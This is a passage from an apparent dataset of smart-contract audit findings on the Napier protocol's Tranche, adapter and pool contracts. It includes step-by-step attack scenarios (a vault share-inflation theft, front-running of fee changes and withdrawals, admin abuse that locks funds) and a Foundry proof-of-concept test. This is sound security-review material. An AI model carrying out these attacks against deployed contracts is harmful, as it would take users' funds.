return (0, 0);\\n if (shares == 0) revert ZeroShares();\\n```\\n\\nHowever, this control alone is not sufficient to guard against vault inflation attacks.\\nLet's assume the following scenario (ignoring fee for 
simplicity's sake):\\nThe victim initiates a transaction that deposits 10 ETH as the underlying asset when there are no issued estETH shares.\\nThe attacker observes the victim's transaction and deposits 1 wei of ETH (issuing 1 wei of estETH share) before the victim's transaction. 1 wei of estETH share worth of PT and YT will be minted to the attacker.\\nThen, the attacker executes a transaction to directly transfer 5 stETH to the adaptor. The exchange rate at this point is `1 wei / (5 ETH + 1 wei)`. Note that the `totalAssets` function uses the `balanceOf` function to compute the total underlying assets owned by the adaptor. Thus, this direct transfer will increase the total assets amount.\\nWhen the victim's transaction is executed, the number of estETH shares issued is calculated as 10 ETH * `1 wei / (5 ETH + 1 wei)`, resulting in 1 wei being issued due to round-down.\\nThe attacker will combine the PT + YT obtained earlier to redeem 1 wei of estETH share from the adaptor.\\nThe attacker, holding 50% of the issued estETH shares (indirectly via the PT+YT he owned), receives `(15 ETH + 1 wei) / 2` as the underlying asset.\\nThe attacker seizes 25% of the underlying asset (2.5 ETH) deposited by the victim.\\nThis scenario demonstrates that even when a revert is triggered due to the number of issued estETH share being 0, it does not prevent the attacker from capturing the user's funds through exchange rate manipulation.чFollowing are some of the measures that could help to prevent such an attack:\\nMint a certain amount of shares to zero address (dead address) during contract deployment (similar to what has been implemented in Uniswap V2)\\nAvoid using the `balanceOf` so that malicious users cannot transfer directly to the contract to increase the assets per share. 
Track the total assets internally via a variable.чLoss of assets for the victim.ч```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n uint256 bufferEthCache = bufferEth; // cache storage reads\\n uint256 queueEthCache = withdrawalQueueEth; // cache storage reads\\n uint256 assets = IWETH9(WETH).balanceOf(address(this)) - bufferEthCache; // amount of WETH deposited at this time\\n uint256 shares = previewDeposit(assets);\\n\\n if (assets == 0) return (0, 0);\\n if (shares == 0) revert ZeroShares();\\n```\\n -Anyone can convert someone's unclaimed yield to PT + YTчmediumчAnyone can convert someone's unclaimed yield to PT + YT, leading to a loss of assets for the victim.\\nAssume that Alice has accumulated 100 Target Tokens in her account's unclaimed yields. She is only interested in holding the Target token (e.g., she is might be long Target token). She intends to collect those Target Tokens sometime later.\\nBob could disrupt Alice's plan by calling `issue` function with the parameter (to=Alice, underlyingAmount=0). The function will convert all 100 Target Tokens stored within Alice's account's unclaimed yield to PT + YT and send them to her, which Alice does not want or need in the first place.\\nLine 196 below will clear Alice's entire unclaimed yield before computing the accrued interest at Line 203. 
The accrued interest will be used to mint the PT and YT (Refer to Line 217 and Line 224 below).\\n```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n lscales[to] = _maxscale;\\n delete unclaimedYields[to];\\n\\n uint256 yBal = _yt.balanceOf(to);\\n // If recipient has unclaimed interest, claim it and then reinvest it to issue more PT and YT.\\n // Reminder: lscale is the last scale when the YT balance of the user was updated.\\n if (_lscale != 0) {\\n accruedInTarget += _computeAccruedInterestInTarget(_maxscale, _lscale, yBal);\\n }\\n..SNIP..\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n```\\n\\nThe market value of the PT + YT might be lower than the market value of the Target Token. In this case, Alice will lose due to Bob's malicious action.\\nAnother `issue` is that when Bob calls `issue` function on behalf of Alice's account, the unclaimed target tokens will be subjected to the issuance fee (See Line 218 above). 
Thus, even if the market value of PT + YT is exactly the same as that of the Target Token, Alice is still guaranteed to suffer a loss from Bob's malicious action.\\nIf Alice had collected the unclaimed yield via the collect function, she would have received the total value of the yield in the underlying asset terms, as a collection of yield is not subjected to any fee.чConsider not allowing anyone to issue PY+YT on behalf of someone's account.чLoss of assets for the victim.ч```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n lscales[to] = _maxscale;\\n delete unclaimedYields[to];\\n\\n uint256 yBal = _yt.balanceOf(to);\\n // If recipient has unclaimed interest, claim it and then reinvest it to issue more PT and YT.\\n // Reminder: lscale is the last scale when the YT balance of the user was updated.\\n if (_lscale != 0) {\\n accruedInTarget += _computeAccruedInterestInTarget(_maxscale, _lscale, yBal);\\n }\\n..SNIP..\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n```\\n -`withdraw` function does not comply with ERC5095чmediumчThe `withdraw` function of Tranche/PT does not comply with ERC5095 as it does not return the exact amount of underlying assets requested by the users.\\nQ: Is the code/contract expected to comply with any EIPs? Are there specific assumptions around adhering to those EIPs that Watsons should be aware of? EIP20 and IERC5095\\nFollowing is the specification of the `withdraw` function of ERC5095. 
It stated that the user must receive exactly `underlyingAmount` of underlying tokens.\\nwithdraw Burns principalAmount from holder and sends exactly underlyingAmount of underlying tokens to receiver.\\nHowever, the `withdraw` function does not comply with this requirement.\\nOn a high-level, the reason is that Line 337 will compute the number of shares that need to be redeemed to receive `underlyingAmount` number of underlying tokens from the adaptor. The main problem here is that the division done here is rounded down. Thus, the `sharesRedeem` will be lower than expected. Consequently, when `sharesRedeem` number of shares are redeemed at Line 346 below, the users will not receive an exact number of `underlyingAmount` of underlying tokens.\\n```\\nFile: Tranche.sol\\n function withdraw(\\n uint256 underlyingAmount,\\n address to,\\n address from\\n ) external override nonReentrant expired returns (uint256) {\\n GlobalScales memory _gscales = gscales;\\n uint256 cscale = _updateGlobalScalesCache(_gscales);\\n\\n // Compute the shares to be redeemed\\n uint256 sharesRedeem = underlyingAmount.divWadDown(cscale);\\n uint256 principalAmount = _computePrincipalTokenRedeemed(_gscales, sharesRedeem);\\n\\n // Update the global scales\\n gscales = _gscales;\\n // Burn PT tokens from `from`\\n _burnFrom(from, principalAmount);\\n // Withdraw underlying tokens from the adapter and transfer them to `to`\\n _target.safeTransfer(address(adapter), sharesRedeem);\\n (uint256 underlyingWithdrawn, ) = adapter.prefundedRedeem(to);\\n```\\nчUpdate the `withdraw` function to send exactly `underlyingAmount` number of underlying tokens to the caller so that the Tranche will be aligned with the ERC5095 specification.чThe tranche/PT does not align with the ERC5095 specification.ч```\\nFile: Tranche.sol\\n function withdraw(\\n uint256 underlyingAmount,\\n address to,\\n address from\\n ) external override nonReentrant expired returns (uint256) {\\n GlobalScales memory _gscales = 
gscales;\\n uint256 cscale = _updateGlobalScalesCache(_gscales);\\n\\n // Compute the shares to be redeemed\\n uint256 sharesRedeem = underlyingAmount.divWadDown(cscale);\\n uint256 principalAmount = _computePrincipalTokenRedeemed(_gscales, sharesRedeem);\\n\\n // Update the global scales\\n gscales = _gscales;\\n // Burn PT tokens from `from`\\n _burnFrom(from, principalAmount);\\n // Withdraw underlying tokens from the adapter and transfer them to `to`\\n _target.safeTransfer(address(adapter), sharesRedeem);\\n (uint256 underlyingWithdrawn, ) = adapter.prefundedRedeem(to);\\n```\\n -Permissioned rebalancing functions leading to loss of assetsчmediumчPermissioned rebalancing functions that could only be accessed by admin could lead to a loss of assets.\\nPer the contest's README page, it stated that the admin/owner is \"RESTRICTED\". Thus, any finding showing that the owner/admin can steal a user's funds, cause loss of funds or harm to the users, or cause the user's fund to be struck is valid in this audit contest.\\nQ: Is the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\nRESTRICTED\\nThe following describes a way where the admin can block users from withdrawing their assets from the protocol\\nThe admin calls the `setRebalancer` function to set the rebalance to a wallet address owned by them.\\n```\\nFile: BaseLSTAdapter.sol\\n function setRebalancer(address _rebalancer) external onlyOwner {\\n rebalancer = _rebalancer;\\n }\\n```\\n\\nThe admin calls the `setTargetBufferPercentage` the set the `targetBufferPercentage` to the smallest possible value of 1%. This will cause only 1% of the total ETH deposited by all the users to reside on the adaptor contract. 
This will cause the ETH buffer to deplete quickly and cause all the redemption and withdrawal to revert.\\n```\\nFile: BaseLSTAdapter.sol\\n function setTargetBufferPercentage(uint256 _targetBufferPercentage) external onlyRebalancer {\\n if (_targetBufferPercentage < MIN_BUFFER_PERCENTAGE || _targetBufferPercentage > BUFFER_PERCENTAGE_PRECISION) {\\n revert InvalidBufferPercentage();\\n }\\n targetBufferPercentage = _targetBufferPercentage;\\n }\\n```\\n\\nThe owner calls the `setRebalancer` function again and sets the rebalancer address to `address(0)`. As such, no one has the ability to call functions that are only accessible by rebalancer. The `requestWithdrawal` and `requestWithdrawalAll` functions are only accessible by rebalancer. Thus, no one can call these two functions to replenish the ETH buffer in the adaptor contract.\\nWhen this state is reached, users can no longer withdraw their assets from the protocol, and their assets are stuck in the contract. This effectively causes them to lose their assets.чTo prevent the above scenario, the minimum `targetBufferPercentage` should be set to a higher percentage such as 5 or 10%, and the `requestWithdrawal` function should be made permissionless, so that even if the rebalancer does not do its job, anyone else can still initiate the rebalancing process to replenish the adaptor's ETH buffer for user's withdrawal.чLoss of assets for the victim.ч```\\nFile: BaseLSTAdapter.sol\\n function setRebalancer(address _rebalancer) external onlyOwner {\\n rebalancer = _rebalancer;\\n }\\n```\\n -Unable to deposit to Tranche/Adaptor under certain conditionsчmediumчMinting of PT and YT is the core feature of the protocol. 
Without the ability to mint PT and YT, the protocol would not operate.\\nThe user cannot deposit into the Tranche to issue new PT + YT under certain conditions.\\nThe comment in Line 133 below mentioned that the `stakeAmount` can be zero.\\nThe reason is that when `targetBufferEth < (availableEth + queueEthCache)`, it is possible that there is a pending withdrawal request (queueEthCache) and no available ETH left in the buffer (availableEth = 0). Refer to the comment in Line 123 below.\\nAs a result, the code at Line 127 below will restrict the amount of ETH to be staked and set the `stakeAmount` to zero.\\n```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n..SNIP..\\n uint256 stakeAmount;\\n unchecked {\\n stakeAmount = availableEth + queueEthCache - targetBufferEth; // non-zero, no underflow\\n }\\n // If the stake amount exceeds 95% of the available ETH, cap the stake amount.\\n // This is to prevent the buffer from being completely drained. 
This is not a complete solution.\\n //\\n // The condition: stakeAmount > availableEth, is equivalent to: queueEthCache > targetBufferEth\\n // Possible scenarios:\\n // - Target buffer percentage was changed to a lower value and there is a large withdrawal request pending.\\n // - There is a pending withdrawal request and the available ETH are not left in the buffer.\\n // - There is no pending withdrawal request and the available ETH are not left in the buffer.\\n uint256 maxStakeAmount = (availableEth * 95) / 100;\\n if (stakeAmount > maxStakeAmount) {\\n stakeAmount = maxStakeAmount; // max 95% of the available ETH\\n }\\n\\n /// INTERACT ///\\n // Deposit into the yield source\\n // Actual amount of ETH spent may be less than the requested amount.\\n stakeAmount = _stake(stakeAmount); // stake amount can be 0\\n```\\n\\nHowever, the issue is that when `_stake` function is called with `stakeAmount` set to zero, it will result in zero ETH being staked and Line 77 below will revert.\\n```\\nFile: StEtherAdapter.sol\\n /// @inheritdoc BaseLSTAdapter\\n /// @dev Lido has a limit on the amount of ETH that can be staked.\\n /// @dev Need to check the current staking limit before staking to prevent DoS.\\n function _stake(uint256 stakeAmount) internal override returns (uint256) {\\n uint256 stakeLimit = STETH.getCurrentStakeLimit();\\n if (stakeAmount > stakeLimit) {\\n // Cap stake amount\\n stakeAmount = stakeLimit;\\n }\\n\\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n uint256 _stETHAmt = STETH.submit{value: stakeAmount}(address(this));\\n\\n if (_stETHAmt == 0) revert InvariantViolation();\\n return stakeAmount;\\n }\\n```\\n\\nA similar issue also occurs for the sFRXETH adaptor. 
If `FRXETH_MINTER.submit` function is called with `stakeAmount == 0`, it will revert.\\n```\\nFile: SFrxETHAdapter.sol\\n /// @notice Mint sfrxETH using WETH\\n function _stake(uint256 stakeAmount) internal override returns (uint256) {\\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n FRXETH_MINTER.submit{value: stakeAmount}();\\n uint256 received = STAKED_FRXETH.deposit(stakeAmount, address(this));\\n if (received == 0) revert InvariantViolation();\\n\\n return stakeAmount;\\n }\\n```\\n\\nThe following shows that the `FRXETH_MINTER.submit` function will revert if submitted ETH is zero below.\\n```\\n/// @notice Mint frxETH to the recipient using sender's funds. Internal portion\\nfunction _submit(address recipient) internal nonReentrant {\\n // Initial pause and value checks\\n require(!submitPaused, \"Submit is paused\");\\n require(msg.value != 0, \"Cannot submit 0\");\\n```\\nчShort-circuit the `_stake` function by returning zero value immediately if the `stakeAmount` is zero.\\nFile: StEtherAdapter.sol\\n```\\nfunction _stake(uint256 stakeAmount) internal override returns (uint256) {\\n// Add the line below\\n if (stakeAmount == 0) return 0; \\n uint256 stakeLimit = STETH.getCurrentStakeLimit();\\n if (stakeAmount > stakeLimit) {\\n // Cap stake amount\\n stakeAmount = stakeLimit;\\n }\\n\\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n uint256 _stETHAmt = STETH.submit{value: stakeAmount}(address(this));\\n\\n if (_stETHAmt == 0) revert InvariantViolation();\\n return stakeAmount;\\n}\\n```\\n\\nFile: SFrxETHAdapter.sol\\n```\\nfunction _stake(uint256 stakeAmount) internal override returns (uint256) {\\n// Add the line below\\n if (stakeAmount == 0) return 0; \\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n FRXETH_MINTER.submit{value: stakeAmount}();\\n uint256 received = STAKED_FRXETH.deposit(stakeAmount, address(this));\\n if (received == 0) revert InvariantViolation();\\n\\n return stakeAmount;\\n}\\n```\\nчMinting of PT and YT is the core feature 
of the protocol. Without the ability to mint PT and YT, the protocol would not operate. The user cannot deposit into the Tranche to issue new PT + YT under certain conditions. Breaking of core protocol/contract functionality.ч```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n..SNIP..\\n uint256 stakeAmount;\\n unchecked {\\n stakeAmount = availableEth + queueEthCache - targetBufferEth; // non-zero, no underflow\\n }\\n // If the stake amount exceeds 95% of the available ETH, cap the stake amount.\\n // This is to prevent the buffer from being completely drained. This is not a complete solution.\\n //\\n // The condition: stakeAmount > availableEth, is equivalent to: queueEthCache > targetBufferEth\\n // Possible scenarios:\\n // - Target buffer percentage was changed to a lower value and there is a large withdrawal request pending.\\n // - There is a pending withdrawal request and the available ETH are not left in the buffer.\\n // - There is no pending withdrawal request and the available ETH are not left in the buffer.\\n uint256 maxStakeAmount = (availableEth * 95) / 100;\\n if (stakeAmount > maxStakeAmount) {\\n stakeAmount = maxStakeAmount; // max 95% of the available ETH\\n }\\n\\n /// INTERACT ///\\n // Deposit into the yield source\\n // Actual amount of ETH spent may be less than the requested amount.\\n stakeAmount = _stake(stakeAmount); // stake amount can be 0\\n```\\n -Napier pool owner can unfairly increase protocol fees on swaps to earn more revenueчmediumчCurrently there is no limit to how often a `poolOwner` can update fees which can be abused to earn more fees by charging users higher swap fees than they expect.\\nThe `NapierPool::setFeeParameter` function allows the `poolOwner` to set the `protocolFeePercent` at any point to a maximum value of 100%. The `poolOwner` is a trusted party but should not be able to abuse protocol settings to earn more revenue. 
There are no limits to how often this can be updated.\\n```\\n function test_protocol_owner_frontRuns_swaps_with_higher_fees() public whenMaturityNotPassed {\\n // pre-condition\\n vm.warp(maturity - 30 days);\\n deal(address(pts[0]), alice, type(uint96).max, false); // ensure alice has enough pt\\n uint256 preBaseLptSupply = tricrypto.totalSupply();\\n uint256 ptInDesired = 100 * ONE_UNDERLYING;\\n uint256 expectedBaseLptIssued = tricrypto.calc_token_amount([ptInDesired, 0, 0], true);\\n\\n // Pool owner sees swap about to occur and front runs updating fees to max value\\n vm.startPrank(owner);\\n pool.setFeeParameter(\"protocolFeePercent\", 100);\\n vm.stopPrank();\\n\\n // execute\\n vm.prank(alice);\\n uint256 underlyingOut = pool.swapPtForUnderlying(\\n 0, ptInDesired, recipient, abi.encode(CallbackInputType.SwapPtForUnderlying, SwapInput(underlying, pts[0]))\\n );\\n // sanity check\\n uint256 protocolFee = SwapEventsLib.getProtocolFeeFromLastSwapEvent(pool);\\n assertGt(protocolFee, 0, \"fee should be charged\");\\n }\\n```\\nчIntroduce a delay in fee updates to ensure users receive the fees they expect.чA malicious `poolOwner` could change the protocol swap fees unfairly for users by front-running swaps and increasing fees to higher values on unsuspecting users. 
An example scenario is:\\nThe `poolOwner` sets swap fees to 1% to attract users\\nThe `poolOwner` front runs all swaps and changes the swap fees to the maximum value of 100%\\nAfter the swap the `poolOwner` resets `protocolFeePercent` to a low value to attract more usersч```\\n function test_protocol_owner_frontRuns_swaps_with_higher_fees() public whenMaturityNotPassed {\\n // pre-condition\\n vm.warp(maturity - 30 days);\\n deal(address(pts[0]), alice, type(uint96).max, false); // ensure alice has enough pt\\n uint256 preBaseLptSupply = tricrypto.totalSupply();\\n uint256 ptInDesired = 100 * ONE_UNDERLYING;\\n uint256 expectedBaseLptIssued = tricrypto.calc_token_amount([ptInDesired, 0, 0], true);\\n\\n // Pool owner sees swap about to occur and front runs updating fees to max value\\n vm.startPrank(owner);\\n pool.setFeeParameter(\"protocolFeePercent\", 100);\\n vm.stopPrank();\\n\\n // execute\\n vm.prank(alice);\\n uint256 underlyingOut = pool.swapPtForUnderlying(\\n 0, ptInDesired, recipient, abi.encode(CallbackInputType.SwapPtForUnderlying, SwapInput(underlying, pts[0]))\\n );\\n // sanity check\\n uint256 protocolFee = SwapEventsLib.getProtocolFeeFromLastSwapEvent(pool);\\n assertGt(protocolFee, 0, \"fee should be charged\");\\n }\\n```\\n -Benign esfrxETH holders incur more loss than expectedчmediumчMalicious esfrxETH holders can avoid \"pro-rated\" loss and have the remaining esfrxETH holders incur all the loss due to the fee charged by FRAX during unstaking. As a result, the rest of the esfrxETH holders incur more losses than expected compared to if malicious esfrxETH holders had not used this trick in the first place.\\n```\\nFile: SFrxETHAdapter.sol\\n/// @title SFrxETHAdapter - esfrxETH\\n/// @dev Important security note:\\n/// 1. 
The vault share price (esfrxETH / WETH) increases as sfrxETH accrues staking rewards.\\n/// However, the share price decreases when frxETH (sfrxETH) is withdrawn.\\n/// Withdrawals are processed by the FraxEther redemption queue contract.\\n/// Frax takes a fee at the time of withdrawal requests, which temporarily reduces the share price.\\n/// This loss is pro-rated among all esfrxETH holders.\\n/// As a mitigation measure, we allow only authorized rebalancers to request withdrawals.\\n///\\n/// 2. This contract doesn't independently keep track of the sfrxETH balance, so it is possible\\n/// for an attacker to directly transfer sfrxETH to this contract, increase the share price.\\ncontract SFrxETHAdapter is BaseLSTAdapter, IERC721Receiver {\\n```\\n\\nIn the SFrxETHAdapter's comments above, it is stated that the share price will decrease due to the fee taken by FRAX during the withdrawal request. This loss is supposed to be 'pro-rated' among all esfrxETH holders. However, this report reveals that malicious esfrxETH holders can circumvent this 'pro-rated' loss, leaving the remaining esfrxETH holders to bear the entire loss. Furthermore, the report demonstrates that the current mitigation measure, which allows only authorized rebalancers to request withdrawals, is insufficient to prevent this exploitation.\\nWhenever a rebalancers submit a withdrawal request to withdraw staked ETH from FRAX, it will first reside in the mempool of the blockchain and anyone can see it. Malicious esfrxETH holders can front-run it to withdraw their shares from the adaptor.\\nWhen the withdrawal request TX is executed, the remaining esfrxETH holders in the adaptor will incur the fee. Once executed, the malicious esfrxETH deposits back to the adaptors.\\nNote that no fee is charged to the users for any deposit or withdrawal operation. 
Thus, as long as the gain from this action is more than the gas cost, it makes sense for the esfrxETH holders to do so.чThe best way to discourage users from withdrawing their assets and depositing them back to take advantage of a particular event is to impose a fee upon depositing and withdrawing.чThe rest of the esfrxETH holders incur more losses than expected compared to if malicious esfrxETH holders had not used this trick in the first place.ч```\\nFile: SFrxETHAdapter.sol\\n/// @title SFrxETHAdapter - esfrxETH\\n/// @dev Important security note:\\n/// 1. The vault share price (esfrxETH / WETH) increases as sfrxETH accrues staking rewards.\\n/// However, the share price decreases when frxETH (sfrxETH) is withdrawn.\\n/// Withdrawals are processed by the FraxEther redemption queue contract.\\n/// Frax takes a fee at the time of withdrawal requests, which temporarily reduces the share price.\\n/// This loss is pro-rated among all esfrxETH holders.\\n/// As a mitigation measure, we allow only authorized rebalancers to request withdrawals.\\n///\\n/// 2. This contract doesn't independently keep track of the sfrxETH balance, so it is possible\\n/// for an attacker to directly transfer sfrxETH to this contract, increase the share price.\\ncontract SFrxETHAdapter is BaseLSTAdapter, IERC721Receiver {\\n```\\n -Lack of slippage control for `issue` functionчmediumчThe lack of slippage control for `issue` function can lead to a loss of assets for the affected users.\\nDuring the issuance, the user will deposit underlying assets (e.g., ETH) to the Tranche contract, and the Tranche contract will forward them to the Adaptor contract for depositing at Line 208 below. The number of shares minted is depending on the current scale of the adaptor. The current scale of the adaptor can increase or decrease at any time, depending on the current on-chain condition when the transaction is executed. 
For instance, the LIDO's daily oracle/rebase update will increase the stETH balance, which will, in turn, increase the adaptor's scale. On the other hand, if there is a mass validator slashing event, the ETH claimed from the withdrawal queue will be less than expected, leading to a decrease in the adaptor's scale. Thus, one cannot ensure the result from the off-chain simulation will be the same as the on-chain execution.\\nHaving said that, the number of shared minted will vary (larger or smaller than expected) if there is a change in the current scale. Assuming that Alice determined off-chain that depositing 100 ETH would issue $x$ amount of PT/YT. When she executes the TX, the scale increases, leading to the amount of PT/YT issued being less than $x$. The slippage is more than what she can accept.\\nIn summary, the `issue` function lacks the slippage control that allows the users to revert if the amount of PT/YT they received is less than the amount they expected.\\n```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n // Transfer underlying from user to adapter and deposit it into adapter to get target token\\n _underlying.safeTransferFrom(msg.sender, address(adapter), underlyingAmount);\\n (, uint256 sharesMinted) = adapter.prefundedDeposit();\\n\\n // Deduct the issuance fee from the amount of target token minted + reinvested yield\\n // Fee should be rounded up towards the protocol (against the user) so that issued principal is rounded down\\n // Hackmd: F0\\n // ptIssued\\n // = (u/s + y - fee) * S\\n // = (sharesUsed - fee) * S\\n // where u = underlyingAmount, s = current scale, y = reinvested yield, S = maxscale\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of 
target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n\\n emit Issue(msg.sender, to, issued, sharesUsed);\\n }\\n\\n```\\nчImplement a slippage control that allows the users to revert if the amount of PT/YT they received is less than the amount they expected.чLoss of assets for the affected users.ч```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n // Transfer underlying from user to adapter and deposit it into adapter to get target token\\n _underlying.safeTransferFrom(msg.sender, address(adapter), underlyingAmount);\\n (, uint256 sharesMinted) = adapter.prefundedDeposit();\\n\\n // Deduct the issuance fee from the amount of target token minted + reinvested yield\\n // Fee should be rounded up towards the protocol (against the user) so that issued principal is rounded down\\n // Hackmd: F0\\n // ptIssued\\n // = (u/s + y - fee) * S\\n // = (sharesUsed - fee) * S\\n // where u = underlyingAmount, s = current scale, y = reinvested yield, S = maxscale\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n\\n emit Issue(msg.sender, to, issued, sharesUsed);\\n }\\n\\n```\\n -Users unable to withdraw their funds due to FRAX admin actionчmediumчFRAX admin action can lead to the fund of Naiper protocol and its users being stuck, resulting in users being unable to withdraw their assets.\\nPer the contest page, the admins of the protocols that Napier integrates with are considered \"RESTRICTED\". 
This means that any issue related to FRAX's admin action that could negatively affect Napier protocol/users will be considered valid in this audit contest.\\nQ: Are the admins of the protocols your contracts integrate with (if any) TRUSTED or RESTRICTED? RESTRICTED\\nWhen the Adaptor needs to unstake its staked ETH to replenish its ETH buffer so that users can redeem/withdraw their funds, it will first join the FRAX's redemption queue, and the queue will issue a redemption NFT afterward. After a certain period, the adaptor can claim their ETH by burning the redemption NFT at Line 65 via the `burnRedemptionTicketNft` function.\\n```\\nFile: SFrxETHAdapter.sol\\n function claimWithdrawal() external override {\\n uint256 _requestId = requestId;\\n uint256 _withdrawalQueueEth = withdrawalQueueEth;\\n if (_requestId == 0) revert NoPendingWithdrawal();\\n\\n /// WRITE ///\\n delete withdrawalQueueEth;\\n delete requestId;\\n bufferEth += _withdrawalQueueEth.toUint128();\\n\\n /// INTERACT ///\\n uint256 balanceBefore = address(this).balance;\\n REDEMPTION_QUEUE.burnRedemptionTicketNft(_requestId, payable(this));\\n if (address(this).balance < balanceBefore + _withdrawalQueueEth) revert InvariantViolation();\\n\\n IWETH9(Constants.WETH).deposit{value: _withdrawalQueueEth}();\\n }\\n```\\n\\nHowever, it is possible for FRAX's admin to disrupt the redemption process of the adaptor, resulting in Napier users being unable to withdraw their funds. 
When the `burnRedemptionTicketNft` function is executed, the redemption NFT will be burned, and native ETH residing in the `FraxEtherRedemptionQueue` contract will be sent to the adaptor at Line 498 below\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n function burnRedemptionTicketNft(uint256 _nftId, address payable _recipient) external nonReentrant {\\n..SNIP..\\n // Effects: Burn frxEth to match the amount of ether sent to user 1:1\\n FRX_ETH.burn(_redemptionQueueItem.amount);\\n\\n // Interactions: Transfer ETH to recipient, minus the fee\\n (bool _success, ) = _recipient.call{ value: _redemptionQueueItem.amount }(\"\");\\n if (!_success) revert InvalidEthTransfer();\\n```\\n\\nFRAX admin could execute the `recoverEther` function to transfer out all the Native ETH residing in the `FraxEtherRedemptionQueue` contract, resulting in the NFT redemption failing due to lack of ETH.\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n /// @notice Recover ETH from exits where people early exited their NFT for frxETH, or when someone mistakenly directly sends ETH here\\n /// @param _amount Amount of ETH to recover\\n function recoverEther(uint256 _amount) external {\\n _requireSenderIsTimelock();\\n\\n (bool _success, ) = address(msg.sender).call{ value: _amount }(\"\");\\n if (!_success) revert InvalidEthTransfer();\\n\\n emit RecoverEther({ recipient: msg.sender, amount: _amount });\\n }\\n```\\n\\nAs a result, Napier users will not be able to withdraw their funds.чEnsure that the protocol team and its users are aware of the risks of such an event and develop a contingency plan to manage it.чThe fund of Naiper protocol and its users will be stuck, resulting in users being unable to withdraw their assets.ч```\\nFile: SFrxETHAdapter.sol\\n function claimWithdrawal() external override {\\n uint256 _requestId = requestId;\\n uint256 _withdrawalQueueEth = withdrawalQueueEth;\\n if (_requestId == 0) revert NoPendingWithdrawal();\\n\\n /// WRITE ///\\n delete withdrawalQueueEth;\\n 
delete requestId;\\n bufferEth += _withdrawalQueueEth.toUint128();\\n\\n /// INTERACT ///\\n uint256 balanceBefore = address(this).balance;\\n REDEMPTION_QUEUE.burnRedemptionTicketNft(_requestId, payable(this));\\n if (address(this).balance < balanceBefore + _withdrawalQueueEth) revert InvariantViolation();\\n\\n IWETH9(Constants.WETH).deposit{value: _withdrawalQueueEth}();\\n }\\n```\\n -Users are unable to collect their yield if tranche is pausedчmediumчUsers are unable to collect their yield if Tranche is paused, resulting in a loss of assets for the victims.\\nPer the contest's README page, it stated that the admin/owner is \"RESTRICTED\". Thus, any finding showing that the owner/admin can steal a user's funds, cause loss of funds or harm to the users, or cause the user's fund to be struck is valid in this audit contest.\\nQ: Is the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\nRESTRICTED\\nThe admin of the protocol has the ability to pause the Tranche contract, and no one except for the admin can unpause it. 
If a malicious admin paused the Tranche contract, the users will not be able to collect their yield earned, leading to a loss of assets for them.\\n```\\nFile: Tranche.sol\\n /// @notice Pause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function pause() external onlyManagement {\\n _pause();\\n }\\n\\n /// @notice Unpause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function unpause() external onlyManagement {\\n _unpause();\\n }\\n```\\n\\nThe following shows that the `collect` function can only be executed when the system is not paused.\\n```\\nFile: Tranche.sol\\n function collect() public nonReentrant whenNotPaused returns (uint256) {\\n uint256 _lscale = lscales[msg.sender];\\n uint256 accruedInTarget = unclaimedYields[msg.sender];\\n```\\nчConsider allowing the users to collect yield even when the system is paused.чUsers are unable to collect their yield if Tranche is paused, resulting in a loss of assets for the victims.ч```\\nFile: Tranche.sol\\n /// @notice Pause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function pause() external onlyManagement {\\n _pause();\\n }\\n\\n /// @notice Unpause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function unpause() external onlyManagement {\\n _unpause();\\n }\\n```\\n -`swapUnderlyingForYt` revert due to rounding issuesчmediumчThe core function (swapUnderlyingForYt) of the Router will revert due to rounding issues. 
